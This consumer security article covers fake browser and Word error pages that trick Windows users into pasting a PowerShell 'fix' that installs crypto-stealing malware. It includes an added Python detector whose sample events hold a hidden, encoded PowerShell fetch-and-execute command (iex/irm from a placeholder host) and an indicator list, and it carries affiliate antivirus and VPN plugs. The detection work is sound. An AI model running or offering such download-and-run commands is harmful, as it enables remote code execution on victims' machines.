Fake software fixes fuel money-stealing malware threat

Online protection firm Proofpoint warns that new and sophisticated malware that impersonates Google Chrome and Microsoft has the potential to steal money from Windows device owners. Multiple groups of cyber criminals are using this malware, including some known for sending spam emails that can infect computers with malware or ransomware.

The malware poses as fake updates in internet browsers like Chrome to trick users into downloading harmful code. Once the code is on the computer, the hackers can access cryptocurrencies, sensitive files, and personal information.

How does the fake update malware work?

Proofpoint identified a larger distribution of the malware earlier this month, but the online protection firm believes the campaign has been ongoing since March 2024. The malware poses as fake Google Chrome, Word, and OneDrive errors to coerce users into downloading harmful code. These errors prompt the visitor to click a button to copy a PowerShell “fix” into the clipboard, then paste and run it in a Run dialog or PowerShell prompt.

“Although the attack chain requires significant user interaction to be successful, the social engineering is clever enough to present someone with what looks like a real problem and solution simultaneously, which may prompt a user to take action without considering the risk,” warns Proofpoint.

When the PowerShell script runs, it first checks whether the device is a valid target, then downloads further payloads. The steps include clearing the DNS cache, clearing the clipboard, displaying a fake message, and downloading a second remote PowerShell script.
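As an added example (not code from the article, Proofpoint or Microsoft), the script below shows how a defender can spot this chain in endpoint telemetry. It assumes process-creation events arrive as JSON lines with Sysmon-style field names (Image, ParentImage, CommandLine, ProcessId); the three sample events are constructed for the demo and the host stage2.invalid is a placeholder. The rule leans on two things the article describes: the command is typed into the Run dialog, so explorer.exe is the parent of the PowerShell process, and the first stage flushes the DNS cache, wipes the clipboard and pulls a second script from the network.

```python
"""Flag the "paste this PowerShell fix into the Run dialog" chain in process
telemetry.  Added example, not the article's, Proofpoint's or Microsoft's code.
Assumed input: JSON lines with Sysmon-style fields (Image, ParentImage,
CommandLine, ProcessId).  Sample events are constructed; stage2.invalid is a placeholder."""
import base64
import json
import re
from dataclasses import dataclass, field
from typing import Optional

# Behaviours the article attributes to the first-stage script, keyed by the
# console fragments that perform them (matched against the lower-cased text).
FRAGMENTS = {
    "flushdns": "clears the DNS cache",
    "set-clipboard": "wipes the clipboard",
    "invoke-webrequest": "fetches a remote script",
    "iwr ": "fetches a remote script",
    "irm ": "fetches a remote script",
    "iex ": "runs downloaded text",
    "-w hidden": "hides its window",
}
# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc).
ENCODED_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SHELLS = {"powershell.exe", "pwsh.exe"}


@dataclass
class Finding:
    pid: int
    parent: str
    reasons: list = field(default_factory=list)
    decoded: str = ""


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(cmd: str) -> str:
    """Base64 of UTF-16LE text, the form -EncodedCommand takes (used for samples)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext behind a -EncodedCommand argument, or '' if none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse_event(event: dict) -> Optional[Finding]:
    """Return a Finding for a suspicious PowerShell launch, else None."""
    if basename(event.get("Image", "")) not in SHELLS:
        return None
    parent = basename(event.get("ParentImage", ""))
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    text = (event.get("CommandLine", "") + " " + decoded).lower()
    interactive = parent == "explorer.exe"  # parent of anything typed into Win+R
    behaviours = sorted({why for frag, why in FRAGMENTS.items() if frag in text})
    # Run-dialog launch: any behaviour or an encoded command is enough.  Other
    # parents need two behaviours, so an admin's lone encoded command stays quiet.
    if interactive and not (behaviours or decoded):
        return None
    if not interactive and len(behaviours) < 2:
        return None
    reasons = ["launched from the Run dialog (parent explorer.exe)"] if interactive else []
    if decoded:
        reasons.append("uses -EncodedCommand")
    return Finding(int(event.get("ProcessId", 0)), parent, reasons + behaviours, decoded)


def scan(lines) -> list:
    """Analyse JSON lines and return the findings in input order."""
    return [f for f in (analyse_event(json.loads(line)) for line in lines) if f]


# Constructed samples: two Run-dialog launches matching the chain, one normal admin session.
SAMPLE_EVENTS = [
    json.dumps({"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell -w hidden -enc " + encode_command(
                    "ipconfig /flushdns; Set-Clipboard -Value ''; "
                    "iex (irm 'http://stage2.invalid/update')")}),
    json.dumps({"ProcessId": 4188, "ParentImage": r"C:\Windows\explorer.exe",
                "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "CommandLine": "powershell Invoke-WebRequest 'http://stage2.invalid/fix.ps1' -OutFile fix.ps1"}),
    json.dumps({"ProcessId": 5002, "ParentImage": r"C:\Users\admin\AppData\Local\Microsoft\WindowsApps\wt.exe",
                "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
                "CommandLine": "pwsh -NoProfile -Command Get-Service -Name Spooler"}),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"pid {f.pid} (parent {f.parent}): " + "; ".join(f.reasons))
```

Running the file prints the two Run-dialog launches and stays silent on the terminal session. The -EncodedCommand decoding matters in practice because the pasted "fix" is usually base64 so the victim never sees what it does; matching on the decoded text rather than the raw command line is what lets the DNS-cache and clipboard indicators fire.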

Cryptocurrency theft

This second script checks if it’s running on a virtual machine before downloading an info-stealer. Once everything is ready, the hacker can access the victim’s cryptocurrency. This scheme redirects the victim’s funds to the hacker instead of the intended recipient.

 

Alternative attack method: Email lure

Proofpoint notes that bad actors also use another method called “email lure” to install harmful software. Emails, typically those that appear to be work- or corporate-related, contain an HTML file that resembles Microsoft Word. These emails prompt users to install the “Word Online” extension to view the document correctly.

As in the method above, users are prompted to open PowerShell and paste the malicious code into it. Proofpoint says the deceptive “campaign” is widespread. “The campaign included over 100,000 messages and targeted thousands of organizations globally,” according to the firm.

5 ways to protect yourself from harmful software

The fake Chrome and Microsoft Word malware creates a sense of urgency, making users click on the links and unknowingly compromise their devices. There are several steps you can take to protect yourself from such malware.

1) Have strong antivirus software: The best way to protect yourself from malicious links that install malware and expose your private information is to have antivirus protection installed on all your devices. It can also alert you to phishing emails and ransomware scams.

My top pick is TotalAV, and you can get a limited-time deal for CyberGuy readers: $19 your first year (80% off) for the TotalAV Antivirus Pro package.  

Get my picks for the best 2024 antivirus protection winners for your Windows, Mac, Android & iOS devices.

2) Use a VPN: Consider using a VPN to keep the websites you visit from tracking you and identifying your location. Many sites can read your IP address and, depending on their privacy settings, may display the city from which you are connecting. A VPN disguises your IP address so that it shows an alternate location.

My top recommendation is ExpressVPN. It has a quick and easy setup, is available in 105 countries, and will not log your IP address, browsing history, traffic destination or metadata, or DNS queries.

Right now, you can get 3 extra months FREE with a 12-month ExpressVPN plan. That’s just $6.67 per month, a savings of 49%! Try it risk-free for 30 days.

For the best VPN software, see my expert review of the best VPNs for browsing the web privately on your Windows, Mac, Android & iOS devices.

3) Monitor your accounts: Regularly review your bank statements, credit card statements, and other financial accounts for any unauthorized activity. If you notice any suspicious transactions, report them immediately to your bank or credit card company.

4) Place a fraud alert: Contact one of the three major credit reporting agencies (Equifax, Experian, or TransUnion) and request a fraud alert to be placed on your credit file. This will make it more difficult for identity thieves to open new accounts in your name without verification.

5) Enable two-factor authentication: Enable two-factor authentication whenever possible. This adds an extra layer of security by requiring a second form of verification, such as a code sent to your phone, in addition to your password.

 

Kurt’s key takeaways

Hackers have cleverly designed malware that prompts you to install it on your devices. This malware specifically targets Windows users, and I’ve noticed that Windows devices seem to be more susceptible to these kinds of attacks. Recently, Microsoft admitted to a Wi-Fi driver flaw in Windows that allows hackers to hijack your PC simply by being on the same Wi-Fi network. It’s crucial to be cautious when browsing online or connecting to public Wi-Fi.

How do you verify the authenticity of software before downloading and installing it on your device? Let us know in the comments below.

Copyright 2024 CyberGuy.com.  All rights reserved.  CyberGuy.com articles and content may contain affiliate links that earn a commission when purchases are made.
